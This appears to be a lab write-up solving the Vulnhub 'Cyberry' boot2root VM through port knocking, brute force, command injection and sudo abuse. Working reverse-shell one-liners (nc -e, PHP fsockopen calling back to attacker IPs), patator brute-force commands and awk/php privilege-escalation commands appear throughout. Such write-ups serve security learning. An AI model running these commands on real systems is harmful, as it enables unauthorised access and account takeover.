Greetings!

A few weeks ago I finished a very interesting Vulnhub.com boot2root challenge named Cyberry.

This challenge contains a logic task, which is why I was close to giving up on it, but in the end it was solved and I found it really nice and interesting. Welcome to this post and see how I did it.

To find the VM's IP address, use arp-scan: arp-scan -I vboxnet0 -l

As usual, the first step is a port scan. On the first scan 666/tcp was open, but by the time I started the service detection scan it was closed, and it never opened again.

PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     ProFTPD 1.3.5b
22/tcp  open   ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 97:7c:74:2b:f1:28:15:dc:8d:67:e0:75:75:44:e9:ad (RSA)
|   256 29:62:8e:10:9b:97:79:3a:18:e6:c0:0b:f7:ec:f8:ee (ECDSA)
|_  256 d9:ba:53:54:78:5d:67:4e:b1:bc:9f:3f:0f:69:83:ab (EdDSA)
80/tcp  open   http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Coming Soon
666/tcp closed doom


Some files and web directories were uncovered with a standard directory wordlist:
/.bashrc
/config.php
/css
/images
/index.html
/login.php
/phpmyadmin
/register.php
/logout.php
/welcome.php

In the meantime I looked at the page source and found some base64-encoded comments:

<!-- bmljZSB0cnkh -->                           //nice try!
<!-- bm90aGluZyB0byBzZWUgaGVyZSE= -->           //nothing to see here!
<!-- dGltZSB0byBtb3ZlIG9uIQ== -->               //time to move on!
<!-- c2VjcmV0ZmlsZS5odG1s -->                   //secretfile.html
<!-- d29yay1pbi1wcm9ncmVzcy5wbmc= -->           //work-in-progress.png

Let's have a look at http://192.168.56.101/secretfile.html.
Congratulations... you must be an uberhacker!
Can you progress any further??
01100010 01101111 01110011 01110011 00101110 01100111 01101001 01100110

Decoded (binary to decimal to ASCII):
98 111 115 115 46 103 105 102
boss.gif -> http://192.168.56.101/boss.gif

So, it is just a gif =)

Let's look at work-in-progress.png, because it is not an image and was not displayed in the web browser:

wget http://192.168.56.101/work-in-progress.png
file work-in-progress.png
work-in-progress.png: ASCII text
cat work-in-progress.png
edocrq

It is a QR code (the file name is "qrcode" reversed): http://192.168.56.101/edocrq
Decoded with https://zxing.org/w/decode: berrypedia.html

The same berrypedia.html also appears in the source of http://IP/login.php, so this is probably the right way.

Let's create a new account cyberry:cyberry and sign in... An admin panel with nothing in it... OK, let's go back to berrypedia.html and look at the page source.

OK, we now know the first username, Chuck or chuck, and the second username, Halle or halle.

The next attack I tried was a brute-force attack on phpMyAdmin with the usernames chuck/Chuck/halle/Halle - no results. I used patator to brute-force phpMyAdmin:

patator http_fuzz url=http://192.168.56.101/phpmyadmin/index.php method=POST body='pma_username=chuck&pma_password=FILE0&server=1&target=index.php&lang=en&token=' 0=/usr/share/john/password.lst before_urls=http://192.168.56.101/phpmyadmin/index.php follow=1 accept_cookie=1 -x ignore:fgrep='Access denied for user' -l /tmp/phpmyadmin_cyberry

OK, the next attack was a brute-force of the FTP service with the same usernames - no results...

At this point I had changed password lists several times, was stuck and ready to give up, but I decided to try harder and found something interesting.

In berrypedia.html there are a few images of strawberries, etc. One is a gif with the text MISSED - http://192.168.56.101/hidden.gif, and the previous one is a rotated picture whose name has an l changed to 1: http://192.168.56.101/placeho1der.jpg
Exif metadata - nothing... But placeho1der.jpg looks strange: first, it contains the changed letter, and second, it is a mirrored picture with a negative effect. At this point I was also trying to find hidden web directories or files, again with nothing, so I decided to undo the mirror and negative changes on the picture.

The result is the picture below.

What does it mean? I read the VM description again and found a hint:
'you will almost certainly require some form of internet access (Search engine) at your disposal to move forward past some of the challenges.'

I used Google to find information about the Port of Tacoma, read it and still did not understand what to do. Meanwhile, patator was working through big password lists =)

My next idea was to split the picture and identify the people. I used Yandex image search to find the musicians' names, from the left corner to the right:
1 Smiley Lewis https://en.wikipedia.org/wiki/Smiley_Lewis
2 Dave Edmunds https://en.wikipedia.org/wiki/Dave_Edmunds
3 Gale Storm https://en.wikipedia.org/wiki/Gale_Storm
4 Fats Domino https://en.wikipedia.org/wiki/Fats_Domino_discography

And what to do with that? How are they linked to the Port of Tacoma...? OK, I created a list of additional usernames and tried to brute-force - nothing...

I tried to attack the web site once again... no additional files, no dirs, nothing... Then I saw the VM developer's message about the search engine once again and tried asking Google about all the musicians' names in one search request:
Smiley Lewis Dave Edmunds Gale Storm Fats Domino

The first result is the song 'I Hear You Knocking': https://en.wikipedia.org/wiki/I_Hear_You_Knocking

All these musicians sang this song in different years, and the lyrics are about knocking. At this point my mind was blown and a crazy idea came up - PORT KNOCKING?!

OK, I found all the years: 1955 1970 1955 1961

That gives 24 variants of permutations; let's create a list:
1955,1970,1955,1961
1955,1970,1961,1955
1955,1955,1970,1961
1955,1955,1961,1970
1955,1961,1970,1955
1955,1961,1955,1970
1970,1955,1955,1961
1970,1955,1961,1955
1970,1955,1955,1961
1970,1955,1961,1955
1970,1961,1955,1955
1970,1961,1955,1955
1955,1955,1970,1961
1955,1955,1961,1970
1955,1970,1955,1961
1955,1970,1961,1955
1955,1961,1955,1970
1955,1961,1970,1955
1961,1955,1970,1955
1961,1955,1955,1970
1961,1970,1955,1955
1961,1970,1955,1955
1961,1955,1955,1970
1961,1955,1970,1955

A simple way to port knock on a local VM, of course:

for p in 1955 1970 1955 1961; do nmap -Pn --max-retries 0 -p $p 192.168.56.101; done
and then run a full nmap scan:
nmap -p- 192.168.56.101

An nmap scan takes 3 minutes, so there is no need to write a script to do it automatically for only 24 permutations.

On the seventh permutation we got a result! It was amazing, because I had spent two days trying to find any further step!
for p in 1970 1955 1955 1961; do nmap -Pn --max-retries 0 -p $p 192.168.56.101; done
61955/tcp open   unknown

Connecting to this port with nc shows it is an Apache:
nc -nv 192.168.56.101 61955
(UNKNOWN) [192.168.56.101] 61955 (?) open
?
HTTP/1.1 400 Bad Request
Date: Mon, 22 Jan 2018 14:12:10 GMT
Server: Apache/2.4.25 (Debian)

It is the same web server on another "protected" port; the web dirs and files are the same.

Registrations are closed, so we cannot log in... http://192.168.56.101:61955/register.php

The default page source has no base64-encoded data, and a linked Twitter account opens a page with strange data...
http://192.168.56.101:61955/H

Using Google I found that it is brainfuck (https://en.wikipedia.org/wiki/Brainfuck); let's use https://www.splitbrain.org/_static/ook/ to decode the data.
Copy, paste and wait... It is better to copy-paste only one line at a time, otherwise it takes a long time. (I did not wait until the end...)

Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw: bakeoff

Update the user list and fire up patator against FTP, SSH and phpMyAdmin.

Let's fire up patator once again against the FTP service:
patator ftp_login host=192.168.56.101 user=FILE0 password=bakeoff 0=userlist.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500

For FTP and SSH, mary's password is bakeoff; for phpMyAdmin it does not work.

First I checked the FTP service, but the ls command ran for too long, so I switched to an SSH login.
Connecting over SSH with username mary terminates the connection immediately... OMG
FTP kept loading for too long, so I decided to restart the machine.

After the restart the FTP service works fine:
ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Nov 29 22:29 .
drwxrwxrwt   3 mary     mary         4096 Nov 29 22:29 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete
Let's check the .bash_history directory:

ftp> ls -lah
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4.0k Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4.0k Nov 29 22:29 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete


Review these two files:
file .reminder.enc
.reminder.enc: openssl enc'd data with salted password
file .trash
.trash: ASCII text

cat .trash
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

But I do not know which cipher was used to encrypt the reminder...

Thank you https://www.securesolutions.no/cipher-and-password-bruteforcing-with-openssl/ for the script =)

while read -r line; do while read -r line2; do openssl "$line" -v -d -in reminder.enc -pass "pass:$line2" -out "cipherout/$line-$line2.txt"; echo "$line $line2"; done < trash.txt; done < ciphers.txt

Create the list of possible ciphers with the command: openssl enc -ciphers
Modify the script and run it; we will get a lot of files in the folder cipherout.

Not working, WHY?! => I forgot the message digest type. (The digest openssl enc uses to derive the key from the password differs between versions: md5 before OpenSSL 1.1.0 and sha256 since, so -md has to match whatever created the file.)


Openssl digests:
-md4            to use the md4 message digest algorithm
-md5            to use the md5 message digest algorithm
-ripemd160      to use the ripemd160 message digest algorithm
-sha            to use the sha message digest algorithm
-sha1           to use the sha1 message digest algorithm
-sha224         to use the sha224 message digest algorithm
-sha256         to use the sha256 message digest algorithm
-sha384         to use the sha384 message digest algorithm
-sha512         to use the sha512 message digest algorithm
-whirlpool      to use the whirlpool message digest algorithm

while read -r line; do while read -r line2; do openssl "$line" -v -d -md md5 -in reminder.enc -pass "pass:$line2" -out "cipherout/$line-$line2.txt"; echo "$line $line2"; done < trash.txt; done < ciphers.txt

Starting from md4, I found the digest algorithm very quickly - it is md5.
How to find the result? Run file on the outputs and look for ASCII text, which means a successful decryption: file * | grep ASCII

So the decrypted message is 'In case I forget, my login is dangleberry69', and it is the second password for user mary.

Where to try it:
1) phpmyadmin - not works
2) website login form - works

The website login form, as user mary, uncovered 2 additional web resources:
http://192.168.56.101:61955/vidplayer.html - with several uploaded videos
http://192.168.56.101:61955/ub3r-s3cur3/index.php - looks like a request-sending script written in PHP

Let's test for command injection; the characters to test with can be found on the OWASP web site or in SecLists:
{ } ( ) < > & * ' | = ? ; [ ] $ - # ~ ! . " % / \ : + , `

I used Burp Intruder to test it.

Command injection works with several special characters: & | ;
I checked it with ls -lah in the current directory:
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data   54 Jan 22 17:24 ls
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4.0K Dec  8 14:57 teamdocs

http://192.168.56.101:61955/ub3r-s3cur3/nb-latin - file with latin words
http://192.168.56.101:61955/ub3r-s3cur3/teamdocs - no files

There are a lot of ways to go next; the first try, of course, is a netcat reverse connection.

Got a connection, so netcat is installed with the -e option =)

MySQL credentials were found:
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', 'wwwelcome');
define('DB_NAME', 'login2');

Got several user hashes:

db login
root:$2y$10$CAad./2tdt.D.cGbroVJDupoUfeL.f5m8L05xUux75tmyvnknSI1e
Smith:$2y$10$QyrXRjl6449dTmuo0gKhK.wJAEAYlshtAmIerfe3IztGVHH0UUm52
9876sfi:$2y$10$CnPyEt64nLbfKCckV9FCa.W5Aknu89vTLx63Pzo2FPmD85dS4Sgju

db login2
mary:$2y$10$HSv6IOAa5MXZT84S.Tkqouj52NstCq3YAxlSankL0Q6JbZiZiMFJe - already known password

db mysql - not found in rockyou
root:*280DE14C8E070782762B9E374049DF70C9B136B5
phpmyadmin:*DAECA523947440E96BB380AF5611FD883EADE3BD
www-data:*276A01899113EB9267FB32FD4E1A579CFA766300

Let's look for something interesting in different directories on this host:

/home/kerry/.nb
cat .access

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABA...5Tmf9Zr nick@cyberry

=> Nick can connect over ssh.

pwd
/home/nick
ls -lah
total 132K
drwxr-xr-x 3 nick  nick 4.0K Dec  7 16:44 .
drwxr-xr-x 9 root  root 4.0K Nov 29 23:58 ..
-rw------- 1 nick  nick  16K Dec  7 16:51 .bash_history
-rw-r--r-- 1 nick  nick  220 Nov 20 22:44 .bash_logout
-rw-r--r-- 1 nick  nick 3.5K Nov 20 22:44 .bashrc
-rw-r--r-- 1 nick  nick  675 Nov 20 22:44 .profile
drwxr-xr-x 2 nick  nick 4.0K Nov 30 01:07 .ssh
-rw-r--r-- 1 nick  nick 8.0K Nov 22 16:23 blackberry
-rw-r--r-- 1 nick  nick 6.1K Nov 22 16:23 blueberry
-rw-r--r-- 1 nick  nick 8.2K Nov 22 16:27 elderberry
-rw-r--r-- 1 nick  nick  435 Nov 22 16:19 email-to-chuck
-rw-r--r-- 1 nick  nick  231 Nov 22 16:19 email-to-halle
-rw-r--r-- 1 nick  nick  797 Dec  7 01:02 email-to-mary
-rw-r--r-- 1 nick  nick  252 Nov 30 01:34 email-to-terry - email to terry in latin, and there was a list with latin words
-rwxr-xr-x 1 nick  nick 7.3K Nov 21 20:22 esp
-rw-r--r-- 1 nick  nick 3.4K Nov 22 16:22 gooseberry
-rwx------ 1 terry nick  629 Nov 22 15:48 invoke.sh - this should be interesting
-rwx------ 1 terry nick 9.8K Nov 23 17:23 makeberry - this should be interesting
-rw-r--r-- 1 nick  nick 5.9K Nov 22 16:26 raspberry
-rw-r--r-- 1 nick  nick 8.7K Nov 22 16:22 strawberry

pwd
/home/chuck
-rw------- 1 chuck chuck  683 Dec  7 16:51 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9.0K Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4.0K Nov 30 23:26 .deleted - should be interesting
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile

Also found the phpMyAdmin database password:
cat config-db.php
<?php
..
$dbuser='phpmyadmin';
$dbpass='n9oKHVKnyBSd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';

Nick has logged in over SSH, and he sent an email in Latin to terry, so let's try to brute-force his password with the nb-latin wordlist.

OK, we got an SSH password:

patator ssh_login host=192.168.56.101 user=nick password=FILE0 0=nb-latin
18:37:08 patator    INFO - 0     38    0.103 | custodio                           |    69 | SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1

Nick has sudo rights:

sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

Let's see what happens when we run invoke.sh and makeberry as terry from nick's account.
sudo -u terry ./makeberry
Hey there terry, hows it hanging?
Give me a word and I'll make a berry out of it!
wtf
Hmm...interesting....I bet 'wtfberries' are extremely juicy!

sudo -u terry ./invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many

readlink --help -> nice, we can probably escalate privileges with this.

sudo -u terry ./invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]

OK, let's try to execute nc, because we know that this nc build supports -e.
sudo -u terry ./invoke.sh /bin/nc -e /bin/bash 192.168.56.1 31338

OK, now we are terry =)

The invoke.sh source:
cat invoke.sh
#!/bin/sh

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Let's check terry's bash history file.

cat .bash_history
...

sudo -E -u halle /usr/bin/awk 'BEGIN {system("/bin/sh")}'
su kerry
sudo -l
cd /home/terry
ls -ahlR
sudo -u halle awk 'BEGIN {system("/bin/sh")}'
...

Probably awk can be run as halle; check sudo:

sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Now I will post the steps quickly, because it is so interesting and I did it in a few minutes:

Yeah, we can read halle's data...

Got the command from bash_history:
sudo -E -u halle /usr/bin/awk 'BEGIN {system("/bin/sh")}'
id
uid=1001(halle) gid=1001(halle) groups=1001(halle)

Now we are halle =)
Check the bash_history file:

cat .bash_history
http://192.168.179.128/php-rs.php
wget http://192.168.179.128/php-rs.php
..
sudo -E -u chuck /usr/bin/php -r '$sock=fsockopen("192.168.179.128",443);exec("/bin/sh -i <&3 >&3 2>&3");'
..
sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
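The three sudo -l outputs above (nick, terry, halle) share the same pattern: SETENV plus NOPASSWD on an interpreter or on a script under a home directory. As an added example that is not part of the original write-up, here is a small audit script that parses such output, flags those rules and follows the run-as chain; the SHELL_CAPABLE set and the rule format handled are assumptions of this example, and the sample input is constructed from the write-up's output.

```python
import re

# Constructed sample input: the three 'sudo -l' outputs quoted in this
# write-up, joined as a privilege audit would collect them per account.
SUDO_L_OUTPUT = """\
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh
User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk
User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php
"""

HEADER_RE = re.compile(r"^User (?P<user>\S+) may run")
# Handles "(runas) TAG: TAG: /absolute/command"; rules like "(ALL) ALL" are
# outside this example's scope and are skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

# Illustrative subset (an assumption, not an exhaustive list) of binaries that
# run arbitrary commands from their own arguments: awk system(), php -r, ...
SHELL_CAPABLE = {"awk", "gawk", "mawk", "php", "perl", "python", "python3",
                 "find", "vi", "vim", "nc"}


def parse_sudo_l(text):
    """Turn 'sudo -l' output into rule dicts: who may run what, as whom, with which tags."""
    rules, user = [], None
    for line in text.splitlines():
        head = HEADER_RE.match(line)
        if head:
            user = head.group("user")
            continue
        rule = RULE_RE.match(line)
        if rule and user:
            rules.append({
                "user": user,
                "runas": rule.group("runas").split(":")[0].strip(),
                "tags": [t.rstrip(":") for t in rule.group("tags").split()],
                "cmd": rule.group("cmd"),
            })
    return rules


def audit(rules):
    """Flag rules that let the caller run code of their choosing as the target user."""
    findings = []
    for r in rules:
        reasons = []
        if r["cmd"].rsplit("/", 1)[-1] in SHELL_CAPABLE:
            reasons.append("shell-capable binary")
        if r["cmd"].startswith("/home/"):
            reasons.append("command under a home directory controlled by its owner")
        if "SETENV" in r["tags"]:
            reasons.append("SETENV overrides env_reset (sudo -E)")
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password prompt")
        if reasons:
            findings.append((r["user"], r["runas"], r["cmd"], reasons))
    return findings


def reachable_identities(rules, start):
    """Identities `start` can become by chaining flagged rules (nick -> terry -> halle -> chuck here)."""
    flagged = {(u, runas) for u, runas, _, _ in audit(rules)}
    seen, todo = set(), [start]
    while todo:
        user = todo.pop()
        for u, runas in flagged:
            if u == user and runas != start and runas not in seen:
                seen.add(runas)
                todo.append(runas)
    return seen


if __name__ == "__main__":
    parsed = parse_sudo_l(SUDO_L_OUTPUT)
    for user, runas, cmd, reasons in audit(parsed):
        print(f"{user} -> {runas}: {cmd}: {', '.join(reasons)}")
    print("nick can reach:", sorted(reachable_identities(parsed, "nick")))
```

The fix on a real host is to drop SETENV, replace interpreters with a purpose-built wrapper outside any user's home directory, and require a password for the rule.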

Let's catch a reverse shell as chuck =)
sudo -E -u chuck /usr/bin/php -r '$sock=fsockopen("192.168.56.1",31339);exec("/bin/sh -i <&4 >&4 2>&4");'

$ id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Let's check chuck's bash history file:

$ cat .bash_history
..
cd /home/chuck/.deleted
..
chmod 700 .deleted
..

And in .deleted there are emails:

$ cat deleted
From:           Berry, Chuck (chuckberry@cyberry)
Sent:           Wednesday, November 22, 2017 2:52pm
To:             Nick, Chuck (nickberry@cyberry)
Subject:        Re: Christmas Meal


Thanks Nick, that might just help me out!

He did give me a few minor clues...

The password starts with "che" and ends with "rry"

letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice

The only other letters in the password were h,w,m & y

I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business
I'll get onto sorting out the Christmas meal. Promise!

Thanks again

-------------------------------------------------------------------

Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"

It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure.
I've been studying latin for a few months now, so it kinda
stuck in the memory

Please don't tell anyone I told you this b.t.w! :-)

-------------------------------------------------------------------

And chuck was connecting as root:


/home/chuck/.deleted/ssh_stuff
$ ls -lah
total 12K
drwx------ 2 chuck chuck 4.0K Nov 30 23:27 .
drwx------ 3 chuck chuck 4.0K Nov 30 23:26 ..
-rw-r--r-- 1 chuck chuck  394 Nov 30 23:27 id_rsa.pub
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAA...I4sal root@cyberry

Let's try to reconstruct the root password from the emails =)
1) The password starts with "che" and ends with "rry"
2) letter e is used three times
   letter c is used twice
   letter r is used twice
   letter b is used twice
   letter a is used twice
3) The only other letters in the password were h,w,m & y
4) I can't recall it exactly but I do remember it being a concatenated 4-word password....You know like "eatberriesandsmile"
5) in fact I'm pretty sure one of those four words was actually latin... Now that I'm thinking about it I'm pretty sure it was "baca"....

OK, there are 5 rules for how the root password was constructed; let's try to build a list of possible passwords.

The third column shows how many letters are left after the known fragments (che, baca, rry) are accounted for:

e - 3 in che:                   2e
c - 2 in che and baca:          0c
r - 2 in rry:                   0r
b - 2 in baca:                  1b
a - 2 in baca:                  0a
h - 1 in che:                   0h
w - 1                           1w
m - 1                           1m
y - 1 in rry:                   0y

At the end we have: 2e 1b 1w 1m = 5 letters, plus (3+4+3) => it should probably be a 15-letter password, if I understand 'The only other letters in the password were...' correctly.

So we have several possible variants of the password, based on the assumption that the smallest word contains 2 letters.

Something like this (@ marks an unknown letter):
che@baca@@@@rry
che@@baca@@@rry
che@@@baca@@rry
che@@@@baca@rry


That should be 4096 possible passwords, easy to brute-force =)

At this point I was thinking... what if h, w, m and y appear more than once, or some letters are upper case!? But let's create a dictionary first and check this type of password.

I used crunch to do it.

-d 2@ allows only 2 duplicate lowercase letters

crunch 15 15 ebwm -t che@baca@@@@rry -d 2@ -o try1.txt //with -d 2@ I got a "Floating point exception" error, so the simple solution is to create 4 different lists and merge them into one.

crunch 15 15 ebwm -t che@baca@@@@rry -o try1.txt
crunch 15 15 ebwm -t che@@baca@@@rry -o try2.txt
crunch 15 15 ebwm -t che@@@baca@@rry -o try3.txt
crunch 15 15 ebwm -t che@@@@baca@rry -o try4.txt

Finally we have 4096 possible passwords (around 20 minutes to brute-force):
cat try1.txt try2.txt try3.txt try4.txt > root_passwd.txt
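Crunch fills the five @ slots with any of e, b, w, m, so most of its 4096 candidates violate the letter counts from the email. As an added example that is not part of the original write-up, the generator below applies all five rules exactly (prefix, suffix, the Latin word in each of the four templates, and the precise letter counts), which shows how far the leaked hints shrink the candidate space; the constraint values are transcribed from the emails above.

```python
from collections import Counter
from itertools import permutations

# Constraints transcribed from the two emails in the write-up.
PREFIX, SUFFIX = "che", "rry"
LATIN_WORD = "baca"
LETTER_COUNTS = Counter({"e": 3, "c": 2, "r": 2, "b": 2, "a": 2,
                         "h": 1, "w": 1, "m": 1, "y": 1})
LENGTH = sum(LETTER_COUNTS.values())   # 15, as the write-up concludes


def remaining_letters(fixed):
    """Letters still unplaced once the fixed fragments are accounted for.
    Raises if the fragments already use a letter more often than allowed."""
    left = LETTER_COUNTS - Counter(fixed)          # drops negative counts
    if sum(left.values()) != LENGTH - len(fixed):
        raise ValueError("fixed fragments contradict the letter counts")
    return sorted(left.elements())


def templates():
    """The four placements of the Latin word inside the 15-character frame,
    keeping at least one free letter between it and the prefix/suffix so the
    result still reads as four concatenated words. '@' marks a free slot."""
    middle = LENGTH - len(PREFIX) - len(SUFFIX)   # 9 characters between che and rry
    out = []
    for offset in range(1, middle - len(LATIN_WORD)):   # offsets 1..4
        mid = "@" * offset + LATIN_WORD + "@" * (middle - offset - len(LATIN_WORD))
        out.append(PREFIX + mid + SUFFIX)
    return out


def satisfies_rules(pw):
    """Check one string against all five rules (useful to validate a guess)."""
    return (len(pw) == LENGTH and pw.startswith(PREFIX) and pw.endswith(SUFFIX)
            and LATIN_WORD in pw and Counter(pw) == LETTER_COUNTS)


def candidates():
    """Every string that satisfies all five rules exactly."""
    free = remaining_letters(PREFIX + LATIN_WORD + SUFFIX)   # ['b','e','e','m','w']
    result = set()
    for tpl in templates():
        slots = [i for i, ch in enumerate(tpl) if ch == "@"]
        for order in set(permutations(free)):           # 5!/2! = 60 distinct orders
            chars = list(tpl)
            for i, ch in zip(slots, order):
                chars[i] = ch
            result.add("".join(chars))
    return result


if __name__ == "__main__":
    cands = candidates()
    print(f"{len(cands)} candidates satisfy every rule (crunch produced 4096)")
    print("all candidates valid:", all(satisfies_rules(p) for p in cands))
```

With the counts applied exactly there are only 240 candidates rather than 4096, which is the practical lesson: every hint written down about a password is a direct reduction of the attacker's work, so hints like these should never be stored or emailed.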

It is patator's time =)

patator ssh_login host=192.168.56.101 user=root password=FILE0 0=root_passwd.txt -x ignore:mesg='Authentication failed.'

And we got a password!
patator    INFO - 0     38    0.065 | chewbacabemerry                    |   589 | SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1

So my assumption that the password is 15 letters long was correct.

root@cyberry:~# id
uid=0(root) gid=0(root) groups=0(root)


root@cyberry:~# cat /etc/shadow


This is the end. I saw 2 binaries and ran strings on them, but did not try anything else with them.

I hope you like this write-up.

Thank you for reading, and thanks to cyberry for this VM =)
